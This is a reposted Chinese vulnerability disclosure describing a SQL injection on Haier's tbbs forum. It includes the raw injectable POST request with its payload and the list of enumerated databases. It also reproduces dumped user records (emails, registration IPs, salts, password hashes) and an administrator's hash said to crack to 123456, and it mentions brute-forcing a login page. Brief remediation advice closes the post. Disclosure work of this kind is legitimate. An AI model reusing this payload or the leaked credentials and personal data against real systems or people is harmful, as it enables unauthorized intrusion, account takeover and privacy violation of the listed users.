海尔论坛SQL注入泄漏2w会员信息可修改UC管理员信息及解决方案 - 网站安全

海尔论坛SQL注入泄漏2w会员信息可修改UC管理员信息及解决方案

2015-01-20 10:37:29 来源：sm0nk

SQL注入，DZ论坛
数据至少2W
trs_ucenter_members_bak
[8846 entries]
Table: trs_common_member
[2727 entries]
Table: uc_members
[8326 entries]

0.目标站点是tbbs.haier.com 这个论坛跟bbs.haier.com 不是一个论坛。

1.先来个小洞crossdomain.xml file

http://tbbs.haier.com/crossdomain.xml

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

2.内部IP泄漏的链接 http://tbbs.haier.com/HaierBBS/test.jsp

10.135.103.22 IP:

管理平台 http://tbbs.haier.com/was5/web/login.jsp 3.SQL注入漏洞注入的时候加个level

POST /HaierBBS/thrdapplycount/gettolcount.do HTTP/1.1
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
Referer: http://tbbs.haier.com/
Cookie: JSESSIONID=C508D821EE8E5CC4B133E91E9FF5D81D.jvm1; idsALUserSource=""
Host: tbbs.haier.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

sourceId=1'%22&type=1%2C5%2C6%2C7%2C8%2C9%2C10

22个数据库

[*] confluence
[*] confluence2
[*] confluence3
[*] confluence4
[*] discuz0719
[*] discuz15
[*] gitlabhq_development
[*] gitlabhq_production
[*] gitlabhq_test
[*] information_schema
[*] logbak
[*] mysql
[*] performance_schema
[*] test
[*] trswcmcluster
[*] trswcmcluster0830
[*] trswcmclustercn
[*] trswcmv65clusterforcn0410
[*] trswcmv65clusterforen
[*] trswcmv65clusterforen1025
[*] trswcmv65clusterforen20131114
[*] trswcmv65plugins

泄漏会员信息，包括用户名、密码、salt、邮箱、手机等 trs_ucenter_members_bak [8846 entries] Table: trs_common_member [2727 entries] Table: uc_members [8326 entries] e.g.

back-end DBMS: MySQL 5.0
Database: discuz15
Table: uc_members
[8326 entries]
+------+---------+---------+--------+--------+-----------------+----------------------------------+----------+------------+--------------------------------------------------------+----------------------------------+-------------+---------------+
| uid  | myid    | myidkey | salt   | babao  | regip           | email                            | secques  | regdate    | username                                               | password                         | lastloginip | lastlogintime |
+------+---------+---------+--------+--------+-----------------+----------------------------------+----------+------------+--------------------------------------------------------+----------------------------------+-------------+---------------+
| 1    | <blank> | <blank> | 170560 | NULL   | 114.245.229.254 | admin@mocard.tv                  | <blank>  | 1259818150 | admin                                                  | e6dbb8e9474d11bd3697ba769a18f204 | 0           | 0             |
| 2    | <blank> | <blank> | 63b267 | NULL   | 114.245.229.254 | kllm868@163.com                  | <blank>  | 1259818742 | kllm868                                                | bd4c0638b9e9cea498aeae9684ce3112 | 0           | 0             |
| 8    | <blank> | <blank> | abff79 | NULL   | 114.245.231.251 | 2507248571111@qq.com             | <blank>  | 1259985674 | #aqa                                                   | 7beb4aed0685006f808f51ce537ec55a | 0           | 0             |
| 10   | <blank> | <blank> | 038643 | NULL   | 218.58.70.250   | wxn_summer520@163.com            | <blank>  | 1259992864 | \xe8??\xe9\xbb?                                        | a2adcc48ade4bf6c24e1510aa26f0ea3 | 0           | 0             |
| 15   | <blank> | <blank> | 3ac3b3 | NULL   | 210.5.133.19    | 94172070@qq.com                  | <blank>  | 1260006611 | s520                                                   | 5c68c562eaa0c48a54f0b587c1c8af7a | 0           | 0             |
| 16   | <blank> | <blank> | 8712f0 | NULL   | 114.245.231.251 | 4698642882w2w@qq.com             | <blank>  | 1260009400 | 2w2w2w                                                 | b5c32024ea7e703a4ac90536dbc381a7 | 0           | 0             |

4.任意修改UC管理员信息通过注入漏洞获得trs_ucenter_members_admin 的管理员信息

+--------+---------+---------+--------+---------------+---------------------+--------+---------+------------+----------+----------------------------------+-------------+---------------+
| uid    | myid    | myidkey | salt   | regip         | email               | avatar | secques | regdate    | username | password                         | lastloginip | lastlogintime |
+--------+---------+---------+--------+---------------+---------------------+--------+---------+------------+----------+----------------------------------+-------------+---------------+
| 173356 | <blank> | <blank> | b351e0 | 10.135.103.22 | kiraqing@vip.qq.com | NULL   | <blank> | 1353657771 | lhtww    | 935af859a07284299ed775479542ff1f | 0           | 0             |
+--------+---------+---------+--------+---------------+---------------------+--------+---------+------------+----------+----------------------------------+-------------+---------------+

虽然密码加salt，但是123456还是能够破解出来的登录之，可以随意更改信息，绑定手机、更换邮箱等等 VIPuser

5.爆破 http://tuser.haier.com/ids/cn/haier_login.jsp?returnUrl=http://tuser.haier.com/HaierFramework/haier/appuser/vipUser/myhaier.jsp 如果UC管理员密码是123456那么其他人也有可能是123456，不测试了。

`漏洞证明：`

`解决方案：`

1.过滤特殊字符 2.管理员界面做访问限制 3.增强口令（估计用）

点击复制链接与好友分享!回本站首页

相关TAG标签海尔信息管理员解决方案会员论坛

上一篇：极客公园官方网站管理员Cookie泄漏直入后台及解决方案

下一篇：网酒网MySQL注射(附验证脚本)

热门专题推荐 md5 解密杀毒软件个人电脑安全脱壳破解 u盘启动工具小马激活工具 office激活 word win7激活工具

图文推荐